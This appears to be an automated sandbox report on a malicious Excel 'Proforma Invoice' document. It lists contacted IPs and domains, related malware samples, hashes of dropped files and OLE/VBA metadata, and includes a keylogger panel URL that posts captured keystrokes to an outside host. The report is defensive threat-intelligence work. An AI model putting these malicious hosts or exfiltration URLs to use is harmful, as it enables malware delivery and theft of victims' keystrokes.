cutt.ly | 104.22.0.232 | true | true | | unknown
shopphongtinh.com | 202.92.6.10 | true | false | | unknown

URLs from Memory and Binaries


Contacted IPs


                                                Public

IP            Domain   Country        ASN    ASN Name                 Malicious
202.92.6.10   unknown  Viet Nam       45899  VNPT-AS-VN VNPT Corp VN  false
104.22.0.232  unknown  United States  13335  CLOUDFLARENET US         true

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:320373
                                                Start date:19.11.2020
                                                Start time:09:55:38
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 6m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Proforma Invoice.xls
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • GSI enabled (VBA)
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal92.expl.evad.winXLS@13/11@2/2
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 5
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xls
                                                • Changed system and user locale, location and keyboard layout to French - France
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.0.174.185, 23.0.174.200, 8.248.115.254, 8.238.85.126, 8.241.126.121, 8.248.113.254, 8.250.153.254
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net

                                                Simulations

                                                Behavior and APIs

Time      Type             Description
09:56:48  API Interceptor  460x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

Match: 202.92.6.10
• Invoice.xlsm (malicious); context: shopphongtinh.com/client.exe
• SA Covid-19 Funding Connection.xlsm (malicious); context: shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
• invoice.exe (malicious); context: shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
• http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II (malicious); context: thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/
Match: 104.22.0.232
• Request_for_Quotation.xlsm (malicious); context: cutt.ly/gdvAeui

                                                Domains

Match: cutt.ly
• Shipping Invoice.xls (malicious); context: 104.22.1.232
• Shipping Invoice.xls (malicious); context: 104.22.1.232
• Shipping Invoice.xls (malicious); context: 104.22.0.232
• wHrBhrpp3q.csv (malicious); context: 172.67.8.238
• wHrBhrpp3q.csv (malicious); context: 172.67.8.238
• wHrBhrpp3q.csv (malicious); context: 172.67.8.238
• SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls (malicious); context: 104.22.1.232
• SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls (malicious); context: 104.22.0.232
• SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls (malicious); context: 104.22.0.232
• SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls (malicious); context: 172.67.8.238
• SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls (malicious); context: 104.22.1.232
• SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls (malicious); context: 104.22.0.232
• Invoice.xls (malicious); context: 104.22.1.232
• Invoice.xls (malicious); context: 104.22.0.232
• Invoice.xls (malicious); context: 104.22.1.232
• file.xls (malicious); context: 104.22.1.232
• file.xls (malicious); context: 172.67.8.238
• file.xls (malicious); context: 172.67.8.238
• File.xls (malicious); context: 104.22.1.232
• File.xls (malicious); context: 172.67.8.238
Match: shopphongtinh.com
• client.exe (malicious); context: 202.92.6.10
• Invoice.xlsm (malicious); context: 202.92.6.10
• SA Covid-19 Funding Connection.xlsm (malicious); context: 202.92.6.10
• invoice.exe (malicious); context: 202.92.6.10

                                                ASN

Match: VNPT-AS-VN VNPT Corp VN
• qkN4OZWFG6.exe (malicious); context: 221.132.33.88
• FMFF7xj5.exe (malicious); context: 103.207.39.131
• rJz6SePuqu.dll (malicious); context: 123.19.40.157
• Order inquiry.exe (malicious); context: 103.207.38.182
• Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exe (malicious); context: 203.162.4.149
• http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/ (malicious); context: 113.160.161.75
• http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/ (malicious); context: 113.160.161.75
• http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm (malicious); context: 113.160.161.75
• OK093822333448.doc (malicious); context: 103.255.237.196
• http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/ (malicious); context: 113.160.250.165
• DETAILS.jar (malicious); context: 103.207.39.83
• Readmore Details.exe (malicious); context: 103.207.39.83
• SecuriteInfo.com.Trojan.PackedNET.405.16508.exe (malicious); context: 103.207.39.83
• detail-information.exe (malicious); context: 103.207.39.83
• INFORMATIONS.doc.......exe (malicious); context: 103.207.39.83
• executed.exe (malicious); context: 103.207.39.83
• _000819.exe (malicious); context: 113.161.148.81
• _000822.exe (malicious); context: 113.161.148.81
• _000819.exe (malicious); context: 113.161.148.81
• _000824.exe (malicious); context: 113.161.148.81
Match: CLOUDFLARENET US
• https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton (malicious); context: 104.18.215.67
• 1099008FEDEX_090887766.xls (malicious); context: 104.20.138.65
• https://akljsdhfas.selz.com/? (malicious); context: 104.18.108.36
• quotation_0087210_pdf.exe (malicious); context: 172.67.188.154
• Purchase Order 40,7045$.exe (malicious); context: 104.24.105.107
• 1099008FEDEX_090887766.xls (malicious); context: 162.159.134.233
• INQUIRY.exe (malicious); context: 104.27.152.230
• PO Quotation.jar (malicious); context: 104.20.22.46
• doc2227740.xls (malicious); context: 104.27.172.15
• PO Quotation.jar (malicious); context: 104.20.23.46
• doc2227740.xls (malicious); context: 104.27.173.15
• TRIAL-ORDER.exe (malicious); context: 104.18.57.249
• d11311145.xls (malicious); context: 104.27.173.15
• 23692 ANRITSU PROBE po 29288.exe (malicious); context: 104.23.99.190
• d11311145.xls (malicious); context: 104.27.173.15
• PO #5618896.gz.exe (malicious); context: 104.23.98.190
• PO#0007507_009389283882873PDF.exe (malicious); context: 162.159.134.233
• 07DYwxlVm4.exe (malicious); context: 104.27.133.115
• 9Pimjl3jyq.exe (malicious); context: 162.159.133.233
• af4db3a6b648b585f8e11b9ff5be73f2.exe (malicious); context: 104.27.133.115

                                                JA3 Fingerprints

Match: 05af1f5ca1b87cc9cc9b25185115607d
• 1099008FEDEX_090887766.xls (malicious); context: 104.22.0.232
• VQ01173428.doc (malicious); context: 104.22.0.232
• SIN029088.xls (malicious); context: 104.22.0.232
• SMBS PO 30 quotation.xls (malicious); context: 104.22.0.232
• SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.Mal.Generic-S.18660.xls (malicious); context: 104.22.0.232
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.Mal.Generic-S.27944.xls (malicious); context: 104.22.0.232
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm (malicious); context: 104.22.0.232
• SecuriteInfo.com.Heur.5466.xls (malicious); context: 104.22.0.232
• WayBill Invoice.xls (malicious); context: 104.22.0.232
• WayBill Invoice.xls (malicious); context: 104.22.0.232
• Untitled 20201030.doc (malicious); context: 104.22.0.232
• request.2890.xls (malicious); context: 104.22.0.232
• request613.xls (malicious); context: 104.22.0.232
• UW_Medley Storage_20201030.xlsm (malicious); context: 104.22.0.232
• Payment_Order_20201111.xlsx (malicious); context: 104.22.0.232

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58936
                                                Entropy (8bit):7.994797855729196
                                                Encrypted:true
                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):326
                                                Entropy (8bit):3.123186963792904
                                                Encrypted:false
                                                SSDEEP:6:kK/swwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                MD5:F8CD22EA1D752D0A58C546F0AC6CA9C8
                                                SHA1:3A7467DA9ADA7285221A925D3E7FD4B27E4EDDCD
                                                SHA-256:59F36F22001C9D2656507517742B5764231B691EEB915DE2F1AA36A6DC79DE4B
                                                SHA-512:D9FB9559B4ACFB344F24DCD30A4D3AE986E06A382774E89B5E14345D48F756B35C27A37759F4D4A6C97A6EB5147E44C41811749064E47B0AFDA401811A622C1D
                                                Malicious:false
                                                Reputation:low
                                                C:\Users\user\AppData\Local\Temp\CCEE0000
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):59586
                                                Entropy (8bit):7.872396235530871
                                                Encrypted:false
                                                SSDEEP:1536:/CyZD1js3bSmSb4wjE7zF0Rhdv1hQzMrTYK:/5jjs3bMb4GE0DrTYK
                                                MD5:D7B180B8ACC7118C6985DD4D14334E3A
                                                SHA1:72E39D040945309D94FE9609FD868BF65B72E1F5
                                                SHA-256:09F0C0B7ABF272A20D18D1464A73FB81E7A3C055A2BB6E826504060E1D6943CD
                                                SHA-512:AD6B670D21DC1E71CA263C42613DA5002AEF117C296CE8EF45449459E47AE7C256314E7B941DE4D4CED01EADD52F82F606D9B9C149E15860B0001ECC6E32D632
                                                Malicious:false
                                                Reputation:low
                                                C:\Users\user\AppData\Local\Temp\CabDFA6.tmp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58936
                                                Entropy (8bit):7.994797855729196
                                                Encrypted:true
                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                C:\Users\user\AppData\Local\Temp\TarDFA7.tmp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):152533
                                                Entropy (8bit):6.31602258454967
                                                Encrypted:false
                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Nov 19 16:56:46 2020, atime=Thu Nov 19 16:56:46 2020, length=8192, window=hide
                                                Category:dropped
                                                Size (bytes):867
                                                Entropy (8bit):4.455870114794823
                                                Encrypted:false
                                                SSDEEP:12:85QWu0tCLgXg/XAlCPCHaXtB8XzB/J96X+WnicvbObDtZ3YilMMEpxRljKEJTdJU:85d9U/XTd6j7oYe2Dv3qHhrNru/
                                                MD5:E367CD6AEFE3E192B7F2441F14DFFBC8
                                                SHA1:BB93A1FBF978B1399D1F1E5C184A4D69BD320971
                                                SHA-256:F9E4E19BD3D356D188FF2B0254A2936280D5754F34EB0133EDA8CB1D580F14F2
                                                SHA-512:90088F697645B4961306F25DA4EEF17B2EB98D8025145A2A316E3CFA0EBCE39A35F96B98445969625C4E673E44D7D7F4D8857E448248B34BF3FF8F59014AB1C0
                                                Malicious:false
                                                Preview: L..................F...........7G..3..X....3..X..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....sQ....Desktop.d......QK.XsQ..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\065367\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......065367..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Nov 19 16:56:46 2020, atime=Thu Nov 19 16:56:46 2020, length=82432, window=hide
                                                Category:dropped
                                                Size (bytes):2088
                                                Entropy (8bit):4.546616668434316
                                                Encrypted:false
                                                SSDEEP:48:8q/XT0jFWttkyLt8BQh2q/XT0jFWttkyLt8BQ/:8q/XojFW/d58BQh2q/XojFW/d58BQ/
                                                MD5:308925A589FCC3CD23F46824D47B4410
                                                SHA1:6DFF690FD78A47B8FB295180AC90DA5B5D339F1E
                                                SHA-256:87ABCE1EC7E9B6E27E0C3FAEB72A4E8AB1E62E1E4706BAB7FEBAC4C5C313268E
                                                SHA-512:EFC12E04F88693ED2CA14D21B7A5AEB85BECEA0948B24D7E73101F1257B3CDB87777897F6B5F4D48D0568919E3D13FB2A9106AD6D77081F14CE7DA07A41F8795
                                                Malicious:false
                                                Preview: L..................F.... ........{..3..X.....s.X.....B...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.....sQ.. .PROFOR~1.XLS..V.......Q.y.Q.y*...8.....................P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\065367\Users.user\Desktop\Proforma Invoice.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......065367..........D_....3N...W...9F.C....
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):101
                                                Entropy (8bit):4.7170989234879075
                                                Encrypted:false
                                                SSDEEP:3:oyBVomMQDMILGMXd6ltaQILGMXd6lmMQDMILGMXd6lv:dj6GKg2afKgKGKgC
                                                MD5:BC11129FCE6D9C1A695193CDCB97B257
                                                SHA1:2EC83352C02CCC01E7513A894800E1219605F24B
                                                SHA-256:31376558D616FB12266F87483A5097CA308C0EA58FCE25853A90FD33BCFE2140
                                                SHA-512:03435DE22EEF6F71B2A327744ABD8B1A1FA8E4C04656A66DC9EBFBD7FE1C493EE857AED2B95AB4C1BB0A9A1D14FE2A6254C1F32453BBE3BC216E52E8EF7EBEC9
                                                Malicious:false
                                                Preview: Desktop.LNK=0..[xls]..Proforma Invoice.LNK=0..Proforma Invoice.LNK=0..[xls]..Proforma Invoice.LNK=0..
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0AYPJJNXJIAU1ZU8MY2M.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF514RYFPTGCAGWGDYOS.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT0OYA3U3UFN4XWUY8ST.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                Entropy (8bit):6.722113426938609
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:Proforma Invoice.xls
                                                File size:76288
                                                MD5:55db711144ff4a35faf58d982e7cf727
                                                SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv
                                                File Content Preview:........................;...................................z..................................................................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4eea286a4b4bcb4

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "Proforma Invoice.xls"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:Microsoft Excel
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Code Page:1252
                                                Author:Dexter MORGAN
                                                Last Saved By:Administrator
                                                Create Time:2020-10-25 18:24:14
                                                Last Saved Time:2020-11-14 12:53:19
                                                Creating Application:Microsoft Excel
                                                Security:1

                                                Document Summary

                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Company:
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:983040

                                                Streams with VBA

                                                VBA File Name: Feuil1.cls, Stream Size: 977
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                VBA File Name:Feuil1.cls
                                                Stream Size:977
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , S . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c 53 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                False
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "Feuil1"
